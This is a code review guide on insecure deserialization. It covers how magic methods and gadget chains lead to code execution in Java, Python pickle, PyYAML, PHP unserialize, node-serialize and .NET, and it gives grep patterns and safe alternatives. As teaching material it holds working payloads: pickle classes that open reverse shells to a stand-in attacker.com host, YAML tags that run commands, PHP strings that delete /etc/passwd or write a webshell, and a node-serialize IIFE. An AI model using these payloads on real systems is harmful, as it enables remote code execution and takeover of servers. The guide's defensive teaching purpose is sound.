What is insecure deserialization?

Insecure deserialization is when an application deserializes untrusted data, allowing attackers to manipulate object state or, with vulnerable gadget chains, achieve remote code execution.

How do you prevent insecure deserialization?

Avoid deserializing untrusted data, prefer data-only formats like JSON with strict schemas, use allowlists of permitted types, and apply integrity checks such as signatures.

Insecure Deserialization Code Review Guide

01 //1. Introduction to Insecure Deserialization

Insecure deserialization occurs when an application deserializes (reconstructs objects from) data that an attacker has tampered with. Serialization converts in-memory objects into a byte stream for storage or transmission; deserialization reverses this. When the serialized data comes from an untrusted source, the deserialization process can instantiate arbitrary objects and trigger magic methods (constructors, destructors, hooks) that execute attacker-controlled code.

⚠ OWASP A08:2021 — Software and Data Integrity Failures

Insecure deserialization was ranked in the OWASP Top 10 (A8:2017) and merged into "Software and Data Integrity Failures" (A08:2021). When a usable gadget chain is present, it often leads to Remote Code Execution, the most critical impact. The vulnerability is language-agnostic: Java, Python, PHP, .NET, Ruby, and even Node.js all have dangerous deserialization patterns. Deserialization flaws have been reported against high-profile targets, including a Java deserialization RCE on a PayPal server.

In this guide, you'll learn how serialization/deserialization works and why it's dangerous, specific exploitation techniques for Java, Python, PHP, Node.js, .NET, and Ruby, what gadget chains are and how they achieve RCE, how to identify dangerous deserialization patterns during code review, and how to prevent deserialization attacks with safe alternatives.

Attack flow: Attacker (crafts malicious object) → Transport (cookie · API · queue · file) → Application (deserializes untrusted data) → RCE (magic methods execute)

Language / Format	Entry Point	Risk
Java	ObjectInputStream	Critical
Python	pickle.loads()	Critical
PHP	unserialize()	Critical
Node.js	node-serialize	Critical
.NET	BinaryFormatter	Critical
Ruby	Marshal.load()	Critical
YAML	yaml.load()	High
JSON	JSON.parse()	Safe

Why is JSON.parse() generally safe while pickle.loads() and Java's ObjectInputStream are dangerous?
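One way to see the difference: a JSON parser can only produce plain data (objects, arrays, strings, numbers, booleans, null), so the payload has no way to name a class or function to run. The sketch below is a minimal Python illustration, assuming a hypothetical session shape with `user` and `role` fields; `parse_session` and `ALLOWED_ROLES` are illustrative names, not part of any library.

```python
import json

ALLOWED_ROLES = {"viewer", "editor", "admin"}  # hypothetical role set


def parse_session(raw: str) -> dict:
    """Parse untrusted JSON and enforce a strict, data-only schema."""
    data = json.loads(raw)  # yields only dict/list/str/int/float/bool/None
    if not isinstance(data, dict) or set(data) != {"user", "role"}:
        raise ValueError("unexpected session shape")
    if not isinstance(data["user"], str) or not isinstance(data["role"], str):
        raise ValueError("fields must be strings")
    if data["role"] not in ALLOWED_ROLES:
        raise ValueError("unknown role")
    return data


print(parse_session('{"user": "alice", "role": "viewer"}'))
```

Parsing is only half of the story: the schema check is what stops an attacker from smuggling in unexpected keys or types that later code might trust.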

02 //2. How Deserialization Attacks Work

The attack follows a consistent pattern across all languages: (1) The application serializes objects and exposes them to the client (cookies, API responses, message queues). (2) The attacker modifies the serialized data to reference dangerous classes. (3) The application deserializes the modified data, instantiating attacker-chosen objects. (4) Magic methods on those objects execute during deserialization, running attacker code.

Magic methods are special methods that the language runtime calls automatically during object lifecycle events. In serialization attacks, the key magic methods are:

Magic Methods Triggered During Deserialization

Language	Method	When Called	Danger
Java	readObject()	When ObjectInputStream reconstructs the object	Runs class-defined logic on attacker-supplied field values; the usual entry point for gadget chains
Java	readResolve()	After readObject() to resolve object references	Can substitute a different object
Python	__reduce__()	Returns a callable + args that pickle uses to reconstruct	Directly specifies what function to call — trivial RCE
Python	__setstate__()	Called to restore object state after creation	Can execute code during state restoration
PHP	__wakeup()	Called immediately when unserialize() creates the object	Common in gadget chains that trigger further actions
PHP	__destruct()	Called when the object is destroyed (last reference released or script end)	Deferred execution that still fires even if __wakeup is restricted
.NET	OnDeserialized()	Callback after deserialization completes	Executes attacker logic post-deserialization
Ruby	marshal_load()	Called to restore object from marshaled data	Can execute arbitrary code during load
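A harmless way to watch one of these hooks fire is to give `__reduce__` a benign callable. The sketch below is illustrative only (the `Demo` class is hypothetical): it shows that the unpickler calls whatever callable the payload names and returns its result, without ever recreating the original class.

```python
import pickle


class Demo:
    def __reduce__(self):
        # (callable, args): the unpickler will call sorted([3, 1, 2])
        return (sorted, ([3, 1, 2],))


result = pickle.loads(pickle.dumps(Demo()))
print(type(result).__name__, result)  # list [1, 2, 3]
```

Swapping `sorted` for a function that runs commands is all it takes to turn this into an exploit, which is why the hook is listed as trivial RCE.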

Simplest deserialization attack: Python pickle

python

import pickle
import os

# Legitimate serialized data (a simple dictionary):
safe_data = pickle.dumps({"user": "alice", "role": "viewer"})
# b'\x80\x05\x95...'

# Attacker crafts a malicious class:
class Exploit:
    def __reduce__(self):
        # __reduce__ tells pickle HOW to reconstruct this object
        # It returns: (callable, args)
        # pickle will call: os.system("id")
        return (os.system, ("id",))

malicious_data = pickle.dumps(Exploit())

# Application deserializes untrusted data:
result = pickle.loads(malicious_data)
# → Executes "id" command on the server!
# uid=1000(webapp) gid=1000(webapp)

# The attacker never needed to know what the original data looked like.
# They just need pickle.loads() to process their crafted bytes.

An application receives serialized objects via cookies. A developer adds HMAC signature verification before deserialization. Is this sufficient?
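The signature check in that scenario can be sketched as follows. This is a minimal illustration, assuming a hypothetical server-side `SECRET_KEY` and a `body.signature` cookie layout (both invented for the example). It pairs the HMAC with JSON rather than a native object format, because a signature only proves that a key holder produced the bytes: if the key leaks, or another component will sign attacker input, a native deserializer would still run whatever the payload encodes.

```python
import base64
import hashlib
import hmac
import json

SECRET_KEY = b"replace-with-a-real-secret"  # hypothetical key, load from config


def sign(data: dict) -> str:
    """Encode data as JSON and append an HMAC-SHA256 signature."""
    body = base64.urlsafe_b64encode(json.dumps(data).encode())
    mac = hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest()
    return f"{body.decode()}.{mac}"


def verify_and_load(cookie: str) -> dict:
    """Verify the signature BEFORE parsing; reject on any mismatch."""
    body, _, mac = cookie.rpartition(".")
    expected = hmac.new(SECRET_KEY, body.encode(), hashlib.sha256).hexdigest()
    # compare_digest avoids leaking the match position through timing
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        raise ValueError("bad signature")
    return json.loads(base64.urlsafe_b64decode(body))


cookie = sign({"user": "alice", "role": "viewer"})
print(verify_and_load(cookie))
```

The order matters: verification happens on the raw bytes, and parsing only runs once the signature has been accepted.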

03 //3. Java Deserialization

Java deserialization is the most extensively researched and exploited deserialization vulnerability class. Java's ObjectInputStream can instantiate any serializable class on the classpath, and the rich Java library ecosystem provides abundant "gadget chains" — sequences of classes whose methods chain together to achieve code execution.

Vulnerable: Deserializing untrusted Java objects

java

// ❌ VULNERABLE: Deserializing user-controlled data
import java.io.*;

public class UserSessionHandler {

    // Receives serialized session from cookie or API body
    public UserSession loadSession(byte[] data) throws Exception {
        ByteArrayInputStream bis = new ByteArrayInputStream(data);
        ObjectInputStream ois = new ObjectInputStream(bis);

        // This single line can execute ARBITRARY CODE
        // if the attacker controls the byte[] data!
        Object obj = ois.readObject();  // ← RCE happens HERE

        return (UserSession) obj;  // Cast happens AFTER deserialization
        // Even if the cast fails, the damage is already done:
        // malicious readObject() methods have already executed
    }
}

// The cast to UserSession is NOT a security check!
// By the time Java tries the cast, ObjectInputStream has already:
// 1. Parsed the serialized bytes
// 2. Instantiated the attacker's chosen classes
// 3. Called readObject() on each, executing malicious code

Java serialized data is identifiable by its magic bytes: AC ED 00 05 (hex) or rO0AB (Base64-encoded). During code review, search for these signatures in cookies, HTTP headers, API bodies, and message queues.
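When reviewing captured traffic rather than source code, the same signatures can be checked mechanically. The sketch below is a rough illustration, assuming a raw `Cookie` header string as input; the `suspicious_cookies` helper is hypothetical, and it only recognises standard Base64 and hex encodings of the stream header.

```python
JAVA_B64_PREFIX = "rO0AB"      # Base64 of AC ED 00 05 ...
JAVA_HEX_PREFIX = "aced0005"   # hex-encoded stream header


def suspicious_cookies(cookie_header: str) -> list:
    """Return names of cookies whose value looks like a Java serialized object."""
    flagged = []
    for pair in cookie_header.split(";"):
        name, _, value = pair.strip().partition("=")
        value = value.strip('"')
        if value.startswith(JAVA_B64_PREFIX) or value.lower().startswith(JAVA_HEX_PREFIX):
            flagged.append(name)
    return flagged


print(suspicious_cookies("theme=dark; session=rO0ABXNyABFVc2VyU2Vzc2lvbg=="))
```

A hit is a lead, not proof: the next step is finding the server-side code that decodes the value and checking whether it reaches readObject().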

Where Java deserialization appears in applications

java

// Common Java deserialization surfaces:

// 1. HTTP cookies or parameters (Base64-encoded)
// Look up the "session" cookie (assumes request is an HttpServletRequest with cookies present)
String sessionData = null;
for (Cookie c : request.getCookies()) {
    if ("session".equals(c.getName())) sessionData = c.getValue();
}
byte[] decoded = Base64.getDecoder().decode(sessionData);
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(decoded));
Object session = ois.readObject();  // ❌ RCE

// 2. JMX (Java Management Extensions), often exposed on internal ports
// Remote JMX uses ObjectInputStream internally

// 3. RMI (Remote Method Invocation), used for inter-service communication
// RMI protocol uses Java serialization by default

// 4. Message queues (ActiveMQ, RabbitMQ with Java serialization)
ObjectMessage msg = (ObjectMessage) consumer.receive();
Object payload = msg.getObject();  // ❌ RCE

// 5. ViewState in JSF (JavaServer Faces)
// Encrypted/signed ViewState can be attacked if the key is known

// 6. Spring Session with Java serialization
// With JDK serialization configured, session data stored in Redis or a database
// is read back through ObjectInputStream

$ heuristic — The Gadget Chain Concept

The attacker doesn't need to find a custom vulnerable class. They chain together methods from common libraries already on the classpath (Apache Commons Collections, Spring, Hibernate). A "gadget chain" is a sequence like: Apache Commons Collections InvokerTransformer → calls Runtime.exec(). Tools like ysoserial generate payloads for dozens of known gadget chains across popular Java libraries.

You find ObjectInputStream.readObject() in your codebase. The developer says it's safe because the application only serializes UserSession objects. What's wrong with this argument?

04 //4. Python pickle & PyYAML

Python's pickle module is explicitly documented as unsafe: "Warning: The pickle module is not secure. Only unpickle data you trust." Despite this, pickle is widely used for caching, session storage, ML model serialization, and inter-process communication.

Python pickle: Multiple RCE techniques

python

import pickle, os

# Technique 1: __reduce__ method (most common)
class RCE1:
    def __reduce__(self):
        return (os.system, ("id",))

# Technique 2: Reverse shell via __reduce__
class RCE2:
    def __reduce__(self):
        import subprocess
        return (subprocess.call, (["/bin/bash", "-c",
            "bash -i >& /dev/tcp/attacker.com/4444 0>&1"],))

# Technique 3: Arbitrary code via exec
class RCE3:
    def __reduce__(self):
        return (exec, ("import socket,subprocess,os;"
            "s=socket.socket();"
            "s.connect(('attacker.com',4444));"
            "os.dup2(s.fileno(),0);"
            "os.dup2(s.fileno(),1);"
            "os.dup2(s.fileno(),2);"
            "subprocess.call(['/bin/sh','-i'])",))

# Technique 4: Using eval (shorter payload)
class RCE4:
    def __reduce__(self):
        return (eval, ("__import__('os').system('id')",))

# Any of these, when serialized and deserialized:
payload = pickle.dumps(RCE1())
pickle.loads(payload)  # → Executes "id" on the server
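Where pickle cannot be removed right away, the standard library lets you override `Unpickler.find_class()` to allowlist the globals a payload may reference. The sketch below follows that documented pattern; the `SAFE_BUILTINS` set and the `restricted_loads` helper are choices made for this example, and the approach is a mitigation rather than a reason to unpickle untrusted data.

```python
import builtins
import io
import os
import pickle

SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}  # example allowlist


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the payload references a global (class or function)
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads(), but only allowlisted globals may be resolved."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Exploit:
    def __reduce__(self):
        return (os.system, ("echo should-not-run",))


print(restricted_loads(pickle.dumps({"user": "alice"})))  # plain data still loads
try:
    restricted_loads(pickle.dumps(Exploit()))
except pickle.UnpicklingError as err:
    print("blocked:", err)
```

The command never runs because the lookup of `os.system` is rejected before the unpickler can call it.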

PyYAML: YAML deserialization RCE

python

import yaml

# ❌ VULNERABLE: yaml.load() with an unsafe Loader
# PyYAML can instantiate Python objects via YAML tags

malicious_yaml = """
!!python/object/apply:os.system
  args: ['id']
"""

# yaml.load(malicious_yaml, Loader=yaml.FullLoader)  # RCE in PyYAML < 5.4
yaml.load(malicious_yaml, Loader=yaml.UnsafeLoader)  # Explicit unsafe

# Other YAML RCE payloads:
# !!python/object/new:subprocess.check_output [['id']]
# !!python/object/apply:subprocess.Popen
#   - ['cat', '/etc/passwd']

# ✅ SAFE: Always use yaml.safe_load()
data = yaml.safe_load(user_input)  # Only creates basic Python types

$ grep — Where Pickle Appears in Codebases

During code review, search for these pickle usage patterns: pickle.loads() on data from HTTP requests, cookies, or database fields; the shelve module (uses pickle internally); joblib.load() for ML model loading; torch.load() for PyTorch models (pickle-based unless weights_only=True is in effect); Redis/Memcached session storage with pickle serialization; Celery task arguments serialized with pickle; and pandas.read_pickle() for DataFrame serialization.
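Text search finds these calls quickly, but a syntax-aware pass cuts out matches inside comments and strings. The sketch below is a minimal example built on the standard `ast` module; the `DANGEROUS_CALLS` set and `find_dangerous_calls` helper are assumptions made for illustration, and it only catches the plain `module.function(...)` form, so aliased imports such as `import pickle as p` or `from pickle import loads` would need extra handling.

```python
import ast

# (module, function) pairs to flag; extend to suit the codebase under review
DANGEROUS_CALLS = {
    ("pickle", "load"), ("pickle", "loads"),
    ("shelve", "open"), ("joblib", "load"),
    ("torch", "load"), ("pandas", "read_pickle"),
    ("yaml", "load"),
}


def find_dangerous_calls(source: str) -> list:
    """Return (line, 'module.func') for each call that matches DANGEROUS_CALLS."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Attribute)
                and isinstance(node.func.value, ast.Name)
                and (node.func.value.id, node.func.attr) in DANGEROUS_CALLS):
            hits.append((node.lineno, f"{node.func.value.id}.{node.func.attr}"))
    return sorted(hits)


sample = "import pickle\nimport json\nsession = pickle.loads(blob)\nconfig = json.loads(text)\n"
print(find_dangerous_calls(sample))
```

Each hit still needs a manual trace back to the data source, since the call is only dangerous when its input can be influenced by an attacker.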

05 //5. PHP unserialize()

PHP's unserialize() is one of the most commonly exploited deserialization functions in web applications. PHP serialized data is human-readable (e.g., O:4:"User":1:{s:4:"name";s:5:"alice";}), making it easy for attackers to craft payloads.

PHP unserialize: Exploitation via __wakeup and __destruct

php

// PHP serialized format is text-based and readable:
// O:4:"User":1:{s:4:"name";s:5:"alice";}
// O = Object, 4 = class name length, "User" = class name
// 1 = number of properties, s:4:"name" = string property name
// s:5:"alice" = string property value

// ❌ VULNERABLE: Deserializing user-controlled data
$data = unserialize($_COOKIE['session']);

// Attacker exploits PHP magic methods:
// __wakeup():   called when object is unserialized
// __destruct(): called when object is destroyed (garbage collection)
// __toString(): called when object is used as string

// Example: File deletion via __destruct
class CacheFile {
    public $filename;
    public function __destruct() {
        // Cleanup: delete cache file when object is destroyed
        unlink($this->filename);  // ← Attacker controls $filename!
    }
}

// Attacker sends cookie with:
// O:9:"CacheFile":1:{s:8:"filename";s:11:"/etc/passwd";}
// When the object is garbage collected, __destruct() deletes /etc/passwd!

// For RCE, chain through classes that call eval(), system(), exec(), etc.
class Logger {
    public $logFile;
    public $logData;
    public function __destruct() {
        file_put_contents($this->logFile, $this->logData);
    }
}
// Attacker writes a PHP webshell (string lengths must match the byte counts exactly):
// O:6:"Logger":2:{s:7:"logFile";s:14:"/var/www/s.php";s:7:"logData";s:30:"<?php system($_GET['cmd']); ?>";}
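Because the format is plain text, a reviewer can list which classes a captured payload would instantiate before it ever reaches unserialize(). The sketch below is a rough heuristic, assuming the standard `O:<len>:"<name>":` object marker; `php_classes` is a hypothetical helper, and string values that happen to contain the same pattern would show up as false positives.

```python
import re

# Matches the object marker  O:<length>:"<ClassName>":
PHP_OBJECT = re.compile(r'O:(\d+):"([^"]+)":')


def php_classes(serialized: str) -> list:
    """Return class names referenced by object markers with a consistent length."""
    return [name for length, name in PHP_OBJECT.findall(serialized)
            if int(length) == len(name.encode())]


payload = 'O:9:"CacheFile":1:{s:8:"filename";s:11:"/etc/passwd";}'
print(php_classes(payload))  # ['CacheFile']
```

Comparing the result with the classes the application legitimately stores makes unexpected entries stand out.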

Where PHP unserialize appears

php

// ❌ Common vulnerable patterns in PHP applications:

// 1. Session data in cookies
$session = unserialize(base64_decode($_COOKIE['session']));

// 2. User preferences
$prefs = unserialize($row['preferences']); // From database

// 3. Cached objects
$cached = unserialize(file_get_contents($cacheFile));

// 4. API parameters
$data = unserialize($_POST['data']);

// 5. WordPress serialized options
$options = unserialize(get_option('my_plugin_settings'));

// ✅ SAFE alternatives:
$data = json_decode($input, true);  // Use JSON instead
// Or restrict allowed classes (PHP 7+):
$data = unserialize($input, ['allowed_classes' => ['User', 'Settings']]);

A PHP application uses unserialize() on data from the database, not directly from user input. Is this safe?

06 //6. Node.js & YAML Deserialization

Node.js doesn't have a built-in native serialization format like Java or Python. However, several npm packages provide serialization that can lead to RCE, and YAML parsing across all languages can be dangerous.

node-serialize: RCE via IIFE in serialized functions

javascript

// The "node-serialize" package can serialize/deserialize functions
// ❌ This package has a known RCE vulnerability (CVE-2017-5941)

const serialize = require('node-serialize');

// Attacker crafts a payload with an immediately-invoked function:
const payload = '{"exploit":"_$$ND_FUNC$$_function(){require(\'child_process\').execSync(\'id\')}()"}';

// When deserialized, the function is reconstructed AND executed:
serialize.unserialize(payload);
// → Executes "id" on the server!

// The _$$ND_FUNC$$_ marker tells node-serialize to treat the value
// as a function. The trailing () makes it an IIFE, so it runs immediately.
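The function marker also makes these payloads easy to spot in logs or stored data. The sketch below is an illustrative check, assuming the payload is valid JSON as in the example above; `contains_function_marker` is a hypothetical helper. Detection like this supports triage only, and the actual fix is to stop passing untrusted input to the package.

```python
import json

FUNC_MARKER = "_$$ND_FUNC$$_"  # prefix node-serialize uses for function values


def contains_function_marker(raw: str) -> bool:
    """True if any string value in the JSON document starts with the marker."""
    def walk(value):
        if isinstance(value, str):
            return value.startswith(FUNC_MARKER)
        if isinstance(value, dict):
            return any(walk(v) for v in value.values())
        if isinstance(value, list):
            return any(walk(v) for v in value)
        return False
    return walk(json.loads(raw))


payload = '{"exploit":"_$$ND_FUNC$$_function(){require(\'child_process\').execSync(\'id\')}()"}'
print(contains_function_marker(payload))           # True
print(contains_function_marker('{"user":"alice"}'))  # False
```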

js-yaml and other YAML parsers

javascript

// js-yaml (Node.js): 3.x had dangerous defaults
const yaml = require('js-yaml');

// ❌ VULNERABLE (js-yaml 3.x, where load() used DEFAULT_FULL_SCHEMA by default):
const unsafeData = yaml.load(userInput, { schema: yaml.DEFAULT_FULL_SCHEMA });
// Tags such as !!js/function could yield executable JavaScript functions

// ✅ SAFE: js-yaml 4.x load() uses a safe schema by default
const data = yaml.load(userInput);

// ✅ SAFE on js-yaml 3.x: use safeLoad(), or pass the safe schema explicitly
// (DEFAULT_SAFE_SCHEMA and DEFAULT_FULL_SCHEMA were removed in 4.x)
const safeData = yaml.load(userInput, { schema: yaml.DEFAULT_SAFE_SCHEMA });

// General rule across all languages:
// - Python: yaml.safe_load() ✅, yaml.load(Loader=FullLoader) ❌
// - Ruby: YAML.safe_load() ✅, YAML.load() ❌ (Ruby < 3.1)
// - Java (SnakeYAML): new Yaml(new SafeConstructor()) ✅, new Yaml() ❌

$ grep — Other Dangerous Node.js Patterns

Beyond dedicated serialization libraries, watch for these Node.js patterns: eval() or new Function() on serialized/stored data; vm.runInNewContext() with user-controlled code (sandbox escapes exist); MongoDB query injection via $where (executes JavaScript server-side); and Redis EVAL with user-controlled Lua scripts.

07 //7. Detection During Code Review

Deserialization vulnerabilities follow language-specific patterns. During code review, systematically search for deserialization functions that process untrusted data.

Deserialization Detection by Language

Language	Dangerous Functions	Magic Bytes / Signatures	Safe Alternative
Java	ObjectInputStream.readObject(), readUnshared(), XMLDecoder.readObject()	AC ED 00 05 (hex), rO0AB (Base64)	JSON (Jackson/Gson), Protocol Buffers
Python	pickle.loads(), shelve.open(), joblib.load(), torch.load()	\x80\x05\x95 (pickle protocol 5)	json.loads(), yaml.safe_load()
PHP	unserialize()	O:, a:, s:, i: prefixes (text-based)	json_decode(), allowed_classes option
Node.js	node-serialize.unserialize(), cryo.parse()	_$$ND_FUNC$$_ marker	JSON.parse() (yields plain data only)
.NET	BinaryFormatter.Deserialize(), ObjectStateFormatter, LosFormatter	00 01 00 00 00 FF FF FF FF	System.Text.Json, protobuf-net
Ruby	Marshal.load(), YAML.load() (< 3.1)	\x04\x08 (Marshal magic)	JSON.parse(), YAML.safe_load()
YAML (all)	yaml.load() (Python), YAML.load (Ruby), Yaml() (Java SnakeYAML)	!!python/object, !!ruby/object tags	safe_load(), SafeConstructor
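The signatures in the table can be folded into a small triage helper for blobs pulled from cookies, queues, or caches. The sketch below is a heuristic under stated assumptions: the `SIGNATURES` list and `guess_format` function are hypothetical, the pickle check relies on the protocol header byte used by protocols 2 through 5, and a match only suggests a format rather than proving it.

```python
import re

# (label, predicate) pairs checked in order; prefixes come from the table above
SIGNATURES = [
    ("java", lambda b: b.startswith(bytes.fromhex("ACED0005")) or b.startswith(b"rO0AB")),
    (".net BinaryFormatter", lambda b: b.startswith(bytes.fromhex("0001000000FFFFFFFF"))),
    ("ruby Marshal", lambda b: b.startswith(b"\x04\x08")),
    ("python pickle", lambda b: re.match(rb"\x80[\x02-\x05]", b) is not None),
    ("php", lambda b: re.match(rb'(O:\d+:"|a:\d+:\{|s:\d+:")', b) is not None),
    ("node-serialize", lambda b: b"_$$ND_FUNC$$_" in b),
]


def guess_format(blob: bytes):
    """Return the first matching serialization format label, or None."""
    for name, matches in SIGNATURES:
        if matches(blob):
            return name
    return None


print(guess_format(b'O:4:"User":1:{s:4:"name";s:5:"alice";}'))  # php
print(guess_format(b'{"user": "alice"}'))                        # None
```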

Quick grep patterns for deserialization

bash

# -E enables alternation with |; literal parentheses are escaped. Run from the repo root.

# Java
grep -rnE "ObjectInputStream|readObject\(|readUnshared\(|XMLDecoder|XStream" --include="*.java" .

# Python
grep -rnE "pickle\.loads?|shelve\.|joblib\.load|torch\.load|yaml\.load|yaml\.full_load" --include="*.py" .

# PHP
grep -rn "unserialize(" --include="*.php" .

# Node.js
grep -rnE "unserialize|deserialize|node-serialize|cryo" --include="*.js" --include="*.ts" .

# .NET
grep -rnE "BinaryFormatter|ObjectStateFormatter|NetDataContractSerializer|LosFormatter|SoapFormatter" --include="*.cs" .

# Ruby
grep -rnE "Marshal\.load|YAML\.load[^_]" --include="*.rb" .

# Check for Java serialized data in cookies/tokens
grep -rnE "rO0AB|ACED0005|base64.*decode.*readObject" --include="*.java" --include="*.xml" --include="*.properties" .

You find this in a Python Flask application: session_data = pickle.loads(redis.get(session_id)). The developer says Redis is internal and trusted. Should you flag this?
